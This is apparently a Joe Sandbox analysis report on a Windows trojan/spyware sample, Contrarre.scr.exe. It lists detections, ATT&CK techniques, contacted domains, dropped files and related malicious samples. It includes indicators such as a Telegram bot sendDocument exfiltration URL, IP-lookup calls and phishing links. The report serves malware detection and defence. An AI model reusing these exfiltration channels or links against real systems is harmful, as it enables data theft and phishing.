Source: Yara match	File source: 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contrarre.scr.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Contrarre.scr.exe PID: 7756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JkYcIYq.exe PID: 7840, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Contrarre.scr.exe	35%	Virustotal		Browse
Contrarre.scr.exe	29%	ReversingLabs	Win32.Trojan.Leonem
Contrarre.scr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\JkYcIYq.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\JkYcIYq.exe	29%	ReversingLabs	Win32.Trojan.Leonem

Source	Detection	Scanner	Label
http://reallyfreegeoip.orgd	0%	Avira URL Cloud	safe
http://checkip.dyndns.orgd	0%	Avira URL Cloud	safe
http://checkip.dyndns.comd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
reallyfreegeoip.org	104.21.48.1	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high
198.187.3.20.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189l	Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comd	Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	Contrarre.scr.exe, 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, JkYcIYq.exe, 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.orgd	Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.189d	Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgd	Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.00000000029FE000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.00000000029EC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/d	Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Contrarre.scr.exe, 00000000.00000002.1386381753.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 00000009.00000002.1417075284.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.0000000002981000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	Contrarre.scr.exe, JkYcIYq.exe.0.dr	false		high
https://api.telegram.org/bot-/sendDocument?chat_id=	Contrarre.scr.exe, 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, JkYcIYq.exe, 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	Contrarre.scr.exe, 00000000.00000002.1387252477.0000000004D5F000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000000.00000002.1387252477.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000008.00000002.2614011404.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, Contrarre.scr.exe, 00000008.00000002.2610648184.0000000000402000.00000040.00000400.00020000.00000000.sdmp, JkYcIYq.exe, 00000009.00000002.1418312946.00000000037F6000.00000004.00000800.00020000.00000000.sdmp, JkYcIYq.exe, 0000000D.00000002.2613870891.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.1	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States		16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592508
Start date and time:	2025-01-16 08:31:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Contrarre.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/11@3/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 98% Number of executed functions: 329 Number of non-executed functions: 54
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 52.149.20.212, 20.3.187.198, 4.245.163.56
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Contrarre.scr.exe, PID 7756 because it is empty
Execution Graph export aborted for target JkYcIYq.exe, PID 8076 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:31:58	API Interceptor	1x Sleep call for process: Contrarre.scr.exe modified
02:31:59	API Interceptor	14x Sleep call for process: powershell.exe modified
02:32:01	API Interceptor	1x Sleep call for process: JkYcIYq.exe modified
07:31:59	Task Scheduler	Run new task: JkYcIYq path: C:\Users\user\AppData\Roaming\JkYcIYq.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	ydJaT4b5N8.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/vq3j/
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.axis138ae.shop/j2vs/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
132.226.247.73	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	order6566546663.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	BNXCXCJSD.jse	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	NEWORDER.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	RENH3RE2025QUOTE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	Invoice#T5O2025.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	Quotation Sheet.doc	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpbm5vY2FwLmNvbQ==	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://yt1s.com/en115	Get hash	malicious	Unknown	Browse	13.107.246.45
	Subscription_Renewal_Invoice_2025_FGHDCS.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://officsccounts.com/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://windsttreamnnet.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://www.emesssages.com/?urid=QyTlFEOMWvDGUZ5NuTEwcsQAq9uusXTlTiiUV_UNfX3LfgVbDW65HSw2eUWnVxn3Z3TwDB0cWifiheGEDHjcg0PTiju0An9QEyWngIpPUi7-1HKUlZGRGhW-Y893C0GaqHPzvSqEu5ekHW5&rg=CUS	Get hash	malicious	Unknown	Browse	13.107.246.45
	Play_VM_Now_23sec.htm	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
reallyfreegeoip.org	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	JHGFDFG.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	New PO.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	order6566546663.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	Order Details.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	BNXCXCJSD.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	NEWORDER.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	QT202515010642.JPG.PDF.vbs	Get hash	malicious	Unknown	Browse	104.17.151.117
	Personliche Nachricht fur Friedhelm Hanusch.pdf	Get hash	malicious	Unknown	Browse	104.18.94.41
	arm7.elf	Get hash	malicious	Unknown	Browse	1.12.192.222
	https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69	Get hash	malicious	Unknown	Browse	172.67.215.98
	https://crm1.ascentismedia.com/MatrixCRM2/CommunicationsCentre/publicpages/LinkTrackers.aspx?link=https%3A%2F%2Fdenionquil.glitch.me%23Y3VzdG9tZXJzZXJ2aWNlQGRpYXRyb24uY29t&blastid=HaJwKgulsuhThrevQ-bg1A==&cc=k7ybaJOHC1q7mw3Z9UVdFw==&linkid=n6XO784zESaOPkbEOEOx87g4IWcBarkC2D1Tdl8CJciDFYwgGprfRd-XvUJO4gpJ&MID=gbzhqmttgi2dknbxgyza&CNO=&isCXComm=1	Get hash	malicious	Unknown	Browse	104.21.63.154
	https://vyralink.emlnk.com/lt.php?x=3DZy~GE7IaWZ5XV7zAA9W.Zs~X7UvAL0v~hgXXLLJ3ag6X8v-Uy.xuG-142imNf#user_email=fiona.zhang@bbraun.com&fname=Zhang&lname=Fiona	Get hash	malicious	Unknown	Browse	104.17.25.14
	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	JHGFDFG.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	https://guf1.xemirax.ru/	Get hash	malicious	Unknown	Browse	104.21.85.129
UTMEMUS	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	order6566546663.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	BNXCXCJSD.jse	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	NEWORDER.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	330tqxXVzm.dll	Get hash	malicious	Wannacry	Browse	132.224.47.164
	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Confirm Bank Statement.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	JHGFDFG.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	New PO.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	order6566546663.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	Order Details.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	BNXCXCJSD.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	NEWORDER.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1

Process:	C:\Users\user\Desktop\Contrarre.scr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JkYcIYq.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\JkYcIYq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//Zj0Uyus:lGLHxvCsIfA2KRHmOugE1s
MD5:	A1E5555CDEE6000368970A9F6FFBB084
SHA1:	C08F4132634F57E8447493295ECF75396D05243F
SHA-256:	2DA99188F4A7204DBEB608241A1CF94BE41722BED7C3BECB82735BEB3F6BC69E
SHA-512:	BA1BEBC469C6238CB9801DA44EC77500E90D7AA20ED3841747E7C1E5725E7F129FFFE30FBEDE5AE49912BF1D6A32FD1C1C263A04E7C042B47DE89BB8D49FC45D
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_50kzxmxd.j1b.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0vcoord.cue.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j10uuvut.d50.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xttxeirf.z5w.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp3B82.tmp

Download File

Process:	C:\Users\user\Desktop\Contrarre.scr.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1566
Entropy (8bit):	5.09208699897332
Encrypted:	false
